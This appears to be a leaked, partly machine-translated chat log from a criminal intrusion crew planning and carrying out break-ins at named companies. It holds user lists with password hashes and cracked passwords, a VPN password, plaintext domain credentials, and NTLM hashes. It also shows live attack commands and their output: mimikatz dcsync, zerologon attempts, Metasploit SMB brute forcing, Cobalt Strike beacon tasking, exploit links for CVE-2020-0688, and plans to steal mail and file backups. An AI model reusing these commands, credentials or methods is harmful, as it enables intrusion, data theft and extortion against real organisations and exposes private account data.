llarrabure 2b323b1cfec9165938df237613b381a2
acrolon e0550f6bb9fa17fd37815f201639ff1a
sdostert cb0d3dc3f81b8963a903cba7ebe02eda
Cmilton e8200daf6b049f0195e235a374e8f62c
Khewson f36fee819dad37f174b81b078b296e2e
Cnelson baf8e023e871f3b5f79512a57c6a62e7
Ppicazo 6189b54305abed05d16b60b48cf72ed7
twood a8588850ef9e29663757ec2382d8fc3b
slopez 77a37eab2d43a85725f7c90fee594d59
kdion 39e1ce27741039350266829c0f7eb4e8
Sloopstra 0ba96b15abe438a3f7e79ffe53de3c96
Svaladez 1e7118c5a0c432e782b748686c178fcd
elamb 3238e1417db8896aa9314d33833366c0
mignacio f48f52d28ea79b1d658ca5d66c5bff36
Bjackson 07502ae807bce83b122f8c1bb3422b54
mmensinger 71738c116989d08d9ef06732a8abad93
will.whiteside e4a22d8e7bbec871b341c88c2e94cba2
jennifer.bond a1c70a25f68e27c1c0012bb0d58edd66
denovo 9953126c4fda15c961b170ec582f64fb
chelsea.symmonds 763ebebf2ba3134afe8f001617a36755
luciente.villanueva ec3ccfd708b8aad44bde184a8cef8bcf
jordan.fanucchi 3cd4601799b7516ccf31d5216ed6a5fa
dan.murphy ab433395e941fc7ede1a74b69537435a
edward.silva 2857f0e40a794a646315b20612cabce6
exocet f07ead77a7ffd23bb963ba68815c7c07
kerri.jensen 2144c88c66e286b224c51df66dffcd0f
aaron.debeers ce38fef132030421c1f237301b208ac6
melina.rivera 2af0abe976a17fe926f45fbd26ef9b3b
caitlyn.moore e80b6e82c8c7136b3a856b3ef0f7a529
susan.hazy 812ce3386fcf3069766863c9560cd9d5
barry.levine 271f5f4c31c1eccd00458e1884f8111a
brian.mcclusky c15c6cf00354b412ffb695036bb0da0f
tom.poland 88da42440abb98e98baaf8d71f6788f0
casey.howard 8d09aec6edff573fa9bafa8c301f7d55
cheri.canada 263dccb097be7270f29ad93249f025b3
smokey.chaiyavong 1aef4a9d29b3918e068acf0c40a6d0e4
Courtney.Boosinger b03e5d6101f4428fc15a4af13c2d1f67
davey.santamaria d43e29494f8a512628556209325910af
amanda.smith 9f492d9fd317748b07d36eead23bd236
kristina.karan 0f9b7619fddf9e02d061d3c580b77820
denovoms be2db0a50a166e29553ed4327fbfed87
perry.reyes 1ac39bdd695eb913a4f0b73d9159e53d
chris.pixton ba03a114def8d5c913983436960e592c
shirley.price e862901df2517d9e9b3edac2225eda71
Libby.Fifer 6be408f1e80386822f4b2052f1f84b4e
robert.lacy a22ddddb0061bb5749884050d9475a49
lookingpoint a65c6ee963098bd3c5d5c623315efd4f
alexandra.ogorman 612410304a2ed887f6bc4109ba2f3541
Siobhan.Johnson f156bd3e058922a64b0257a7ee93c6f4
schedule ca2b3bf6af89151f2c40299fe279307c
``I'll send you a list of all the users and hashes there is an option to check the list of hashes)))) how to 1? I check the hashes of dudes from the group "vpn users" and what are you doing? no more give you everything+++ right? we have @user3 with #evo-com
@user8 with #1-done-korbel-com
@user4 @user7 with #waterway-comwhich one of them should have admin rights therefind the mail server - try the acctsDa clarification of some circumstances, just lack of data on the network itselfa what are these changes related to?as you go along, I think you'll figure it out, I think you select mail - ehroghty where there is an admin account on this EAC which provides mailboxes unloading find a server and look at it as a backup is a additional url on the server and like it `/ecp ` what is it exchange admin sektepoka only 1 option of developmentkak what algorithm of actions after finding the servak itself?yes i think how to formulate the question on this point@user7 and @user8 tell me how to do the 3 point) yes, you)[ ](https://mediaeveryone.com/channel/general?msg=wcGT7Kum4gkjpBfCj) and yet) there is a question on these points i will not answer any more@all look here and write that you saw the message) we backups? 3 the point is clear? how do you download them later within the limits of gblistings is clear, but backups are heavy. do we download? so there are no questions later[ ](https://mediaeveryone.com/channel/general?msg=dd53m3dEGGvG3cL69) @all all saw?[ ](https://mediaeveryone.com/channel/general?msg=XFXSWgCDeHQPLFrGX) what is it about?+ additional tasks nimbul like nimbul did not come, there's nothing moved? in the confines?[ ](https://mediaeveryone.com/channel/general?msg=YCFp4f789HRuFcdwx) ok, I would have that archive - came you under @user9 logged in? you seem to be in the confineshelp with waterwayapplication is closed/closed. I reinstalled it, so far it works, what's wrong with it?
f2bad4ac1e1a8562a7275c93d73bddeb 1234qwerASDF!@#$
29742bb43819d7ac0f12e0abec4ae5ce W3lcome?
29742bb43819d7ac0f12e0abec4ae5ce W3lcome?
06d681b7146acf1131ad37740fc9d902 #Ch3ckm30ut#
393f7aa28c905690ffe626d41a814343 agpmadmin
f2bad4ac1e1a8562a7275c93d73bddeb 1234qwerASDF!@#$
bd626598054a653c5b29362e7ccf0fda @@rdv@r$
36c873c206d2d7561f356fdc9c6c7298 switchscan
2839726ca10411244ad1fda1149a335c fkb1882

I'll give you the hashes above, you can check[ ](https://mediaeveryone.com/channel/general?msg=g63wScBdhr2cDqgdz) yes, YES long time ago should have changed, right?[ ](https://mediaeveryone.com/channel/general?msg=GFSYB3Aimw3z2vMas) and stop ... YES these on kmd5 passed
ben.mandeville f2bad4ac1e1a8562a7275c93d73bddeb
daniel.harvey 29742bb43819d7ac0f12e0abec4ae5ce
daniel.harvey_adm 29742bb43819d7ac0f12e0abec4ae5ce
Honcho 06d681b7146acf1131ad37740fc9d902
agpm_admin 393f7aa28c905690ffe626d41a814343
Ben.mandeville_adm f2bad4ac1e1a8562a7275c93d73bddeb
Jcomfort bd626598054a653c5b29362e7ccf0fda
switchscan 36c873c206d2d7561f356fdc9c6c7298
SMSadmin 2839726ca10411244ad1fda1149a335c
``I think there's about domain authorization there.``Are you trying to admin? They changed their passwords a long time agohave a look for vpn / remote / offsite / partner groups
similarwhen our process is complemented by the following actions:
1) remove backups listings up to 7 levels of nesting
2) whine file listings or table structures
3) Backup of mail server
4) fetch 3-4 file backups from the network, and immediately adinfodsink is in the archive above? and try to access these links, you need to pull from the ntds hashes of all users from the group associated with vpn://vpn.korbel.com/global-protect/login.espURL : https://vpn1.korbel.com/+webvpn+/index.htmlhttps://vpn2.korbel.com/global-protect/login.еѕрнужен 1 volunteer to korbel) even lessa in the confab? not much at all (here are such messages from the network, information about external accesses anything interesting there, in principle... and you need something specific? already looking at the question is important check it comptipo what, come to life? user9 should be nothing? backups listings, network architecture files-who left interesting files from #1-done-korbel-com ?so once again, to all the questions when some changes in the work he has something with the rock I @user4 not in the network today@user9 absent, so everything is in place, get it all vpna password what is it? zgLLMB1KXkzV6Dtn4GWQ8S49+accesses someone already have `104.171.123.166:45330`
it's not new, but not too dirty+disassemble and report who got what2 clean``
23.106.160.165
https://rawint.com
----------------------------------------------------------------------------------------
172.93.109.18:51630
S36rQDbsTVH7D62swcBBexyxGkbNBFalsgx
``````
172.241.27.18
https://agesk.com
----------------------------------------------------------------------------------------
209.222.97.8:62460
TnRLaHoRRRwyezbn6ybP1ed1xRlhtnAQAM5o
``in the work we have #waterway-com #evo-com I will give out two new clean the old koba is preparing to close and let's more distribute so then wait for everyone I'm hooked there for closing already, did not catch this momentkat some database files, structures, backups and other things it is not interesting)pinganut on it remained build and hosts[ ](https://mediaeveryone.Pri vet! Little@user3 here, but you corbel no "interesting" files? + the rest are delayed? so zhesam how? yes with a knocked-down sleep mode is not very restfulHi all, happy holidays) as you had a rest?:space_invader:lol, fixed it)
no connection to the dk for a while
The sessions stayed
I'm still connected to itc-us.com,kznm
I couldn't get anywhere
tried zerologon
It seemed to work
but
it won't let me remove dcsync
mimikatz lsadump::dcsync /dc:SS-Data2.Austin.SilencerShop.com /user:SilencerShop\krbtgt /authuser:SS-DATA2$ /authdomain:. /authpassword:"" /authntlm
just doesn't output anything after running the command
pth doesn't work because I don't have rights to run it
Same as yesterday
brute force attack didn't work
I will try to dig into the networking hardware ``msf6 auxiliary(scanner/smb/smb_login) > set pass_file /home/acta/pwd7-12-utf.txt
pass_file => /home/acta/pwd7-12-utf.txt
msf6 auxiliary(scanner/smb/smb_login) > run
[*] Scanned 4 of 22 hosts (18% complete)
[*] Scanned 8 of 22 hosts (36% complete)
[*] Scanned 8 of 22 hosts (36% complete)
[*] Scanned 9 of 22 hosts (40% complete)
[*] Scanned 11 of 22 hosts (50% complete)
msf6 auxiliary(scanner/smb/smb_login) > options
[*] Error: 192.168.1.137: RubySMB::Error::NegotiationFailure Unable to negotiate SMB1 with the remote host: Read timeout expired when reading from the Socket (timeout=30)
[*] Scanned 14 of 22 hosts (63% complete)
[*] Scanned 16 of 22 hosts (72% complete)
[*] Scanned 18 of 22 hosts (81% complete)
[*] Scanned 20 of 22 hosts (90% complete)
[*] Scanned 22 of 22 hosts (100% complete)
[*] Auxiliary module execution completed


``No progress so far. Charging brut smb
https://github.com/Ridter/cve-2020-0688
https://github.com/zcgonvh/CVE-2020-0688
https://github.com/Yt1g3r/CVE-2020-0688_EXP
The ``things''.
Exploit and detect tools for CVE-2020-0688(Microsoft Exchange default MachineKeySection deserialize vulnerability
I think they have it internally and look for their exh1) I don't think a reset will work under that
2) i don't think it will work under another account so if your user is already an admin here, on the nasa disabled interactions through utilities and it goes as fs100-102 you 3 hosts - NetApp with a large number of balls confused you 3 hosts what exactly - nasa? well smb_login says he there admin on the three that abovea stop some local admin group on the 3?at least on these machines where? so we have an admin jetak on this case need admin rights to the machine where you will reset) clearing no chance? password depends on something else most likely ablyahmnu I actually have two and alive, I will not check more until he hash on the two cars does not coincide `` ``
Remote Support:1003:aad3b435b51404eeaad3b435b51404ee:5ce89fa1e9148477eb5d6aa455c2d494:::
``+ since there are 30k pk there is 100% exchange serverpk from the same group where rem sapp found check thisocgroup - OU=ocean or sabnet I would say subnet you mean subnet by group? 1 the group on satnets and users? webmordoy, satnets how so? mostly there satnets around 20a in their group?((almost 30kahahaha how many pk in ad comps? + is there a point? smb_login not tried it yesterday i tried to pull cars with it, not all succeeded it did not roll anywhere? yes, local``
Remote Support:1003:aad3b435b51404eeaad3b435b51404ee:295b43446eb7ee2c640e238481366061:::
``I don't think they went everywhere and changed it by the way this Remote Support is local as I rememberRemote Support did not find a new one? before the change of the password it was a long time ago he collected them[ ](https://mediaeveryone.com/group/snpartners-com?msg=uc5wJRzd5E7tPvt8h) and with these all? 10.51.128.230 on two subnets there is only one car with rdp is closed at them?
[*] 172.31.190.102:445 - Executing the command...
[*] 172.31.190.102:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.31.190.102[\svcctl] ...
[-] 172.31.190.102:445 - Unable to execute specified command: Failed to bind. Could not bind to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.31.190.102[\svcctl]
[-] 172.31.190.102:445 - Unable to connect for cleanup: The server responded with an unexpected status code: STATUS_ACCESS_DENIED. Maybe you'll need to manually remove \WINDOWS\Temp\DmWDlRDmpcujzxcN.bat from the target.
[*] 172.31.190.102:445 - Scanned 1 of 1 hosts (100% complete)
``````
setg Proxies socks4:107.161.126.162:2914
``and give sockshmm[vvv some load on it now just psexec?[ ](https://mediaeveryone.com/group/snpartners-com?msg=9DgDeXLzLH2H9aMgo) psexec_command``.
beacon> shell wmic /node:172.31.190.100 /user:JDOSSN\nddevbernst /password:Tractor20! OS GET Name
[*] Tasked beacon to run: wmic /node:172.31.190.100 /user:JDOSSN\ndevbernst /password:Tractor20! OS GET Name
[+] host called home, sent: 114 bytes
[+] received output:
Node - 172.31.190.100

ERROR:

Description = The RPC server is unavailable.
``a vmik?``
beacon> shell net use * \\\172.31.190.100\C$ /user:JDOSSN\nddevbernst Tractor20!
[*] Tasked beacon to run: net use *\\\172.31.190.100\C$ /user:JDOSSN\nddevbernst Tractor20!
[+] host called home, sent: 96 bytes
[+] received output:
System error 5 has occurred.

Access is denied.
1) without the \ at the end
2) with a direct quote
beacon> shell net use \\172.31.190.101!\C$\
[*] Tasked beacon to run: net use \\\172.31.190.101\C$\
[+] host called home, sent: 59 bytes
[+] received output:
System error 53 has occurred.

The network path was not found.

``````
beacon> net share \\\172.31.190.101
[*] Tasked beacon to run net share on 172.31.190.101
[+] host called home, sent: 104505 bytes
[+] received output:
Shares at \172.31.190.101:

 Share name Comment
 ---------- -------
 ILPRARIESTATE_HD
 DHS_AVTEST
 WAWASHINGTON_HD
 WAWASHINGTON_EQARC
 TXSOUTH_HD
 TXSOUTH_EQARC
 TXRAYLEE_HD
 TXRAYLEE_EQARC
 TXQUALITY_HD
 TXQUALITY_EQARC
 TXBEPARTNERS_HD
 TXBEPARTNERS_EQARC
 TXAGPOWER_HD
 TXAGPOWER_EQARC
 TNRITCHIE_HD
 TNRITCHIE_EQARC
 TNGENERAL_HD
 Sybase_Shared
 SKMAPLEFARM_HD
 SKMAPLEFARM_EQARC
 SKJAYDEE_HD
 SKJAYDEE_EQARC
 SDGROSSENBURG_HD
 SDGROSSENBURG_EQARC
 SDAttachVol2
 SDAttachVol1
 rontest1$
 QuorumFileWitnessA
 profvol2
 profvol1
 OHLESLIE_HD
 OHLESLIE_EQARC
 OHFINDLAY_HD
 OHFINDLAY_EQARC
 NYZAHMANDMATSON_EQARC
 NYCAZENOVIA_HD
 NYCAZENOVIA_EQARC
 NMPECOS_HD
 NMPECOS_EQARC
 NESTUTHEIT_HD
 NEGREENLINE_HD
 NEGREENLINE_EQARC
 NDLEADING_HD
 NDLEADING_EQARC
 NDGRAFTON_HD
 NDGRAFTON_EQARC
 NDDAKOTA_HD
 NDDAKOTA_EQARC
 NCSOUTHEASTFARM_HD
 NCSOUTHEASTFARM_EQARC
 NBGREENDIAMOND_HD
 NBGREENDIAMOND_EQARC
 MX_Shared
 MTFRONTLINEAGSOL_HD
 MTFRONTLINEAGSOL_EQARC
 MTFRONTLINE_HD
 MTFRONTLINE_EQARC
 MOJFROLING_HD
 MOHORIZON_HD
 MNMANKATO_HD
 MNHAUG_HD
 MNHAUG_EQARC
 MITRICOUNTY_HD
 MITRICOUNTY_EQARC
 MIDANDG_HD
 MIDANDG_EQARC
 MexicoHomeDir
 KYLIMESTONE_HD
 KYLIMESTONE_EQARC
 KSAMERICAN_HD
 KSAMERICAN_EQARC
 Keys$
 JDISHomeDir
 JDIS_Shared
 JDIS_HD
 JDIS_EQARC
 ipc$
 ILSAMPLE_HD
 ILPRAIRIESTATE_HD
 ILPRAIRIESTATE_EQARC
 ILNEFF_HD
 ILNEFF_EQARC
 ILMARTINSULLIVAN_HD
 ILMARTINSULLIVAN_EQARC
 ILKELLYSAUDERR_HD
 ILKELLYSAUDERR_EQARC
 ILJDISINFRASOL_HD
 ILJDISEQUIP_HD
 ILJDISEQUIP_EQARC
 ILITECERTLOADTEST_HD
 ILITECERT_HD
 ILITECERT2_HD
 ILHOLLAND_HD-path
 ILHOLLAND_HD
 ILHOLLAND_EQARC
 ILHOGANWALKER_HD
 ILDEMO_HD
 ILCROSS_HD
 ILCROSS_EQARC
 ILCITRATEST_HD
 ILARENDSBROS_HD
 ILARENDSBROS_EQARC
 ILARENDSAWE_HD
 ILARENDSAWE_EQARC
 ILARENDSANDSONS_HD
 ILARENDSANDSONS_EQARC
 iaworkshopvol
 IAWORKSHOP_HD
 IAWORKSHOP_EQARC
 IASCHENKELBERG_EQARC
 IAPHELPS_HD
 IAPHELPS_EQARC
 IAHULTGREN_HD
 IABRAKKE_HD
 IABRAKKE_EQARC
 IABODENSTEINER_HD
 IABODENSTEINER_EQARC
 FLSMITH_HD
 FLSMITH_EQARC
 FLHOBO_HD
 FLDOBBS_HD
 FLDOBBS_EQARC
 drtest
 DLR_Shared2
 DLR_Shared1
 dhsrepo
 DETAYLOR_HD
 DETAYLOR_EQARC
 DealerConfig
 COMVEQUIPMENT_HD
 COHONNEN_HD
 COHONNEN_EQARC
 channel_enviroment_support
 CATHOMASON_HD
 CASANJOAQUIN_EQARC
 CALAWRENCE_HD
 CALAWRENCE_EQARC
 CAFRESNO_HD
 CAFRESNO_EQARC
 CACALCOAST_HD
 CACALCOAST_EQARC
 c$
 ARSWARK_HD
 ALSUNSOUTH_HD
 ALSUNSOUTH_EQARC
 admin$
``but these cars are NetAppuser7okenet use?``No userpod normal what do you mean? and user7 here too check the validity of the cradag.......
```
beacon> shell dir \\172.31.190.100\C$\ProgramData
[*] Tasked beacon to run: dir \\172.31.190.100\C$\ProgramData
[+] host called home, sent: 66 bytes
[+] received output:
Access is denied.

beacon> shell dir \\172.31.190.101\C$\ProgramData
[*] Tasked beacon to run: dir \\172.31.190.101\C$\ProgramData
[+] host called home, sent: 66 bytes
[+] received output:
Access is denied.

beacon> shell dir \\172.31.190.102\C$\ProgramData
[*] Tasked beacon to run: dir \\172.31.190.102\C$\ProgramData
[+] host called home, sent: 66 bytes
[+] received output:
Access is denied.

``````
172.31.190.100:445 (platform: 500 version: 5.0 name: NDHSNASC9102 domain: JDOSSN)
 
172.31.190.101:445 (platform: 500 version: 5.0 name: NDHSNASC9103 domain: JDOSSN)
 
172.31.190.102:445 (platform: 500 version: 5.0 name: NDHSNASC9014 domain: JDOSSN)
``````
[+] 172.31.190.100:445 - 172.31.190.100:445 - Success: 'JDOSSN\nddevbernst:Tractor20!' Administrator
 
[+] 172.31.190.101:445 - 172.31.190.101:445 - Success: 'JDOSSN\nddevbernst:Tractor20!' Administrator
 
[+] 172.31.190.102:445 - 172.31.190.102:445 - Success: 'JDOSSN\nddevbernst:Tractor20!' Administrator
``On a subnet with DK polzak on three machines admin, I'll try to knock, maybe there YES passed by@tl1
```
10.51.128.122:25 (220 10.51.128.122 ESMTP Sendmail 8.14.3/8.14.3; Fri, 23 Oct 2020 15:53:27 -0500)
10.51.128.122:21 (220 (vsFTPd 2.2.2))
```
any idea what to post here?
on vsFTPd only vsftpd_234_backdoor didn't work with 2.2.2
on SMTP not quite figured out with enum, there user_file is taken from local machine, but why it is taken - is not clear, in idea it must deduce users, which rotate there, and not check with entered by me, no?
smtp_ntlm_domain just works without output
for relay session in the msf need, but how to drop it there - no idea, 445 open, but the same dir says type network name not found

On webmords interesting found Avaya, tried knocking there with nddevbernst codes - did not work, with those above, from webroot - stood for about 20 minutes and I turned it off, so it did not show anything
It won't let me into the ciski, it just won't load.
[+] 10.51.128.199:445 - 10.51.128.199:445 - Success: 'JDOSSN\nddevbernst:Tractor20!

`` * Username : nddevbernst
	 * Domain : JDOSSN
	 * NTLM : 5b622ad5d550408ed6260c2b8fb185cc

 Result：
Tractor20!>sAMAccountName: nddevkodell
```
>memberOf: CN=NDLEADING_ISG,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_SALES,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_ALL,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_All_Email,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_EQUIPRDB-SALES-RENTAL,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING SharePoint,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_EQUIP_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_Excel_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_All_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local

``Kevin O'Dell
d33r31 !Well deactivated )
```
User name svc_BuildAutomator
Full Name EQBuildAutomator
Comment
User's comment
Country/region code 000 (System Default)
Account active No
Account expires Never

Password last set 10/20/2020 9:13:16 PM
Password expires Never
Password changeable 10/21/2020 9:13:16 PM

``and on those who ``were'' as well.
User name svc_snow_preprod
Full Name Service Now PreProd
Comment Service Now Preprod
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 10/19/2020 7:38:46 AM

``YeahPassword last set 10/21/2020 4:26:58 AM They probably got wind of it a couple days ago
they changed the passwords and removed most of the danes didn't fit the passwords that were in the beginning try to these accounts I built in the beginning``
beacon> shell net group "domain admins" /dom
[*] Tasked beacon to run: net group "domain admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
The request will be processed at a domain controller for domain jdossn.local.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
DHSAdmin jdodmp_svc
The command completed successfully.

``It gave me a different result, it's strange``
Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
a900221 AuditDB_svc AuditJDOSSNDA
DHSAdmin jdodmp_svc MPXAXDAgentAccount
PAM_PRD_JDO_EQI_01 PAM_PRD_JDO_EQI_02 scom
svc_audit svc_BuildAutomator svc_exchange
svc_OMAA svc_OMDAS svc_OMREAD
svc_scomsql_2019 svc_snow_preprod
The command completed successfully.
UserName : jdodmp_svc
ComputerName : JDODC67.jdossn.local
SessionFrom : 204.54.154.136
SessionFromName : JDODMP03.jdossn.local
LocalAdmin : False
¶¶ Well, the two domains admins)))) but fucking there are two:D so they took it, I say not ask for it
the password was set by some network admin it's LA passwords now we'll check it on all domains admins sure sure) ok yes
Administrator:500:aad3b435b51404eeaad3b435b51404ee:12bd62ad7e74da42794b82f59d3c18ee:::
``didn't understand the question I was admin sure стоит?попробуйjeremstew@gmx.com
1Qwerty1:::seclold I'm now with my card or you have an account without balance? there Purchase button should be there are credits on the accountpurchasevoneaFound.But this is a payment record. Purchase Get free credits on all? no one has been disconnected? Please wait up to 5 days. A notification email will be sent to youprost how many I've been there - always no luck):man_shrugging: )and why not check[ ](https://mediaeveryone.com/group/snpartners-com?msg=xLFzSBxBLKzgnqn7B) ?there by the way their passwords that are in hashes on kmd5 do not work? it's unlikely domain pass... but you could try it.
 https://www.gotomeeting.com/meeting/sign-in Presenter Login: blainee@leadingedgeequip.com Password: NDleading2020$
``no see liku look in citrix 2fatam 2faon there's an admin? o_o where is that from?
```
--- Chromium Credential (User: ndmicjsater) ---
URL : https://my.webrootanywhere.com/default.aspx
Username : jasons@leadingedgeequip.com
Password : jsateren8726
``and cisco netswich did open)``and cisco opens on https? https://10.51.128.5 Cisco ASDM 7.1(2)ugh the fucking cloud karocha on it netapp is vindanas? ah, well where it LA there
`>operatingSystem: NetApp Release 8.3.2P7 `` I'll look it up straight "it" Well, I wrote above that there are on the servers LA, but he does not see the fs why then and that mmm for cars for between the chair and the monitor an empty coconut hangs on-call-aspects because they for techportaok, will dotakaya acke on the servers almost never rbaotayuta not on the servers?to the servers, all - and this is what they brute-force available hosts from other segments?
but i doubt that someone outside this segment(hmDa like yes, HP kinda lets in on the proxei switches are all mfu's?
I don't know the models by eye so) MFPs? 10.51.128.171 WORKGROUP\HPFEA60E [Win]
10.51.128.149 00-00-00-00-00 WORKGROUP\HPC67872 [Win]
10.51.128.122 00-80-91-CE-12-74 MFP13505140 [Win]
10.51.128.82 FC-3F-DB-4D-76-CB NPI4D76CB [Win?]
10.51.128.84 44-1E-A1-33-BA-C1 NPI33BAC1 [Win?]

do these hosts say anything?
on the workgroups try the local admin they have here on the network
You can also try to use your users... if it will let though unlikely some unknown cisco10.51.128.5 7C-69-F6-E6-2D-C1 [SSH-1.99-Cisco-1.25]you can set on brute force if lockout will not directly hydra under sockets on webforum try to web on switch admin/admin admin/password
i used a similar garbage and it didn't work for me) do you use it?
https://github.com/k8gege/Ladonони create the domains I guess...
10.51.128.60 [ ] [lighttpd] [HPE OfficeConnect Switch 1920S 48G 4SFP JL382A]
10.51.128.64 [ ] [lighttpd] [HPE OfficeConnect Switch 1920S 48G 4SFP JL382A]
```
switches...``
10.51.128.83 [NPIF68328] [Virata-EmWeb/R6_2_1] [HP LaserJet 400 M401dne 10.51.128.83]
10.51.128.84 [NPI33BAC1] [Virata-EmWeb/R6_2_1] [HP LaserJet P2055dn 10.51.128.84]
10.51.128.3 [ ] [Gateway] [AT&amp;T VPN Gateway]
10.51.128.10 [ ] [] []

[+] received output:
10.51.128.62 [ ] [Embedthis-Appweb/3.4.2] []
10.51.128.61 [ ] [HTTPD] [Web managerment Home]
10.51.128.60 [ ] [lighttpd] [HPE OfficeConnect Switch 1920S 48G 4SFP JL382A]
10.51.128.64 [ ] [lighttpd] [HPE OfficeConnect Switch 1920S 48G 4SFP JL382A]

[+] received output:
10.51.128.144 [DESKTOP-CGJQ23A.ndleading.jdossn.local] [Virata-EmWeb/R6_2_1] [HP LaserJet 400 M401n 10.51.128.144]
10.51.128.122 [MFP13505140] [Apache] [TopAccess--> <script language=javascript type=t]
10.51.128.148 [NPIB93D57.ndleading.jdossn.local] [Virata-EmWeb/R6_2_1] [HP Color LaserJet M452dn 10.51.128.148]
10.51.128.149 [HPC67872.ndleading.jdossn.local] [HP HTTP Server; HP PageWide Pro 577 MFP - D3Q21A; Serial Number: CN77RGY02F; Built: Tue Jan 03, 2017 11:01:43AM {MAHDWOPP1N001.1708D.00}] []
10.51.128.161 [BrightSign-42D8D2010516.ndleading.jdossn.local] [] [BrightSign&reg;]

[+] received output:
10.51.128.171 [HPFEA60E.ndleading.jdossn.local] [nginx] []
10.51.128.185 [NPI5D1B70] [Virata-EmWeb/R6_2_1] [HP Color LaserJet MFP M477fdw 10.51.128.185]

[+] received output:
10.51.128.200 [ ] [IPOffice/] [About IP Office R11.0]

I'm looking for it...they are not actually connected to the local network and communication with the domain goes through the iron...this is very common in retail...one of several offices is a separate division))
[+] 172.31.190.101:445 - 172.31.190.101:445 - Success: 'JDOSSN\ndmicjsater:aad3b435b51404eeaad3b435b51404ee:67595f137f7f5908e3ed202bc4b14aa9' Administrator
```
I found several servers where this guy is an admin, but I can't get ls
```
beacon> shell dir \\172.31.190.100\c$
[*] Tasked beacon to run: dir \\\172.31.190.100\c$
[+] host called home, sent: 54 bytes
[+] received output:
Access is denied.
``They have their own separate dns to that fucking ndleadingDNS Suffix Search List. . . . . . . . .ndleading.jdossn.local.
                                       jdossn.local from the trusts is not pinging[ ](https://mediaeveryone.com/group/snpartners-com?msg=j4BcvMfjTAAExZCDP) is it their server subnet or can't see it?
dn:CN=DHSLAB.local,CN=System,DC=jdossn,DC=local
>whenCreated: 2020/06/03-07:40:09 Central Daylight Time
>name: DHSLAB.local
>securityIdentifier: S-1-5-21-1864881788-682989080-4277963046
>trustDirection: 1 [Inbound(1)
>trustPartner: DHSLAB.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]
``````
JDOSSN.LOCAL [172.31.216.12]

JDODC67.jdossn.local [172.31.190.47]

jdodc64.jdossn.local 172.31.190.11 172.31.190.10

-----------------------------

JDOSQL07.jdossn.local 172.31.190.190
I know about it and it's a dk which you can see here diap172.31.190.10:445 (platform: 500 version: 10.0 name: JDODC64 domain: JDOSSN)192.111.152.122:35475 vIbC1kLiaga
got it
access pj to cobalt where open sessions on these livewilma on them all have sessions? all, yes? candisofficew088726121926w0887260919js not in hell candyoffice is spelled so? candyofficedesktop-gcpb49aw08987712191w08987712192)) fuck, how do I ipac then look in hell ....10.0.220.138 hostnames buddy... hostnames...10,29,220,125 if there's a sqlsrv process anywhere - do a sqlcmd -Ljrkaroo
all hosts where you have access to give) nt authority system do not understand the question if you have LA - then there must be a SYSTEM no i mean that hosts where the system? i'm all hell myself will look further hostname enough so do not really need it nt servers there as i understood the system read? i will look something just hostnames is important Karoch
please send me a list of hosts where you have L.A. what machine?
what's its purpose? just a workstation or some becofis i don't know where the fuck you scanned from? all ranges? o_only portscan the range that is listed there i did so ping each sabinet select **.*.1open subnets.txt needed to get out) the ones that are from me even if not all. but it is not exact) but why did you look for them? they are all in subnets.txt which found I user9 subnets dumped pliz explain what is it?
10.29.220.0 users

10.51.128.0 users + admin

172.31.190.0 nas + servers

204.54.154.136 DA home subnet

172.31.216.0 servers

10.99.198.0

172.31.225.0

10.99.201.0 --

172.31.45.0

10.99.194.0

10.99.205.0

10.99.202.0

10.99.193.0

10.99.195.0

10.99.207.0

10.99.199.9

10.99.204.0

10.99.206.0
``Checked viam - backups on ehshekhety enough? this is from one listing + I'll look again, if I find something - I'll ask you 10 do not need 10 years old? backups of mail interesting a lot of office documents, presentations, reports all sorts. there are backups of mail, virtual machines - everything is old and in single copies.
	CROCKETSTORAGE
FRANCESTORAGE
GERMANYSTORAGE
HENDSTORAGE
INDYSTORAGE
MXSTORAGE
NVSTORAGE
OHSTORAGE
ORANGESTORAGE 10.1.8.8
POLSTORAGE
SHENZHENSTORAGE
SINGSTORAGE
SUPERDATA
SUZHOUSTORAGE
TXSTORAGE
VASTORAGE
```
is it only in rtpi they have one garbage? there are about 20 servers? there is nothing valuable in it?[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=yb2NEKF9yY9ioHELz) there is a real garbage. since 2006, or+ you can and esx given with valuable infofile garbage only on backup servers the same file listings as on skulenewe mean esx? the backup server listings are
backup 1 skool server
skool listings up to level 7
accounting files stolen
backup 1 mail YES
access to ecx

correct me if i missed that + it's files and listings skuljes no listings also check the presence of this crap from the eex and found passwords took away only one had something significant i only servaky here about browserswaterway was on some in another network even in another domain did not collect them before? avec yes i checked on different let go why should i from the second?
if it didn't work the first time
beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe Angel Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe Angel Administrator j@mez9olk
[+] host called home, sent: 113765 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe bbuerck Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe bbuerck Administrator j@mez9olk
[+] host called home, sent: 113769 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe canceleta Administrator j@mez9olk
